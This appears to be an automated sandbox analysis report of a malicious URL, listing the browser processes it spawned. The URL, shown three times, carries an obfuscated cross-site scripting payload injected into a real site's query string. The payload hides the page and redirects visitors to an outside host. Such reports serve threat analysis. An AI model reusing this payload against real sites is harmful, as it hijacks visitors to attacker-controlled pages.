Analysis
-
max time kernel
128s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
13-06-2024 07:34
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E
Resource
win10v2004-20240611-en
General
-
Target
https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E
Malware Config
Signatures
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E1⤵PID:1960
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4376,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=3896 /prefetch:11⤵PID:1372
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=3824,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4936 /prefetch:11⤵PID:4872
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5328,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:81⤵PID:4784
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5336,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5420 /prefetch:81⤵PID:4396
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=1308,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:81⤵PID:3852
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=5544,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:81⤵PID:1668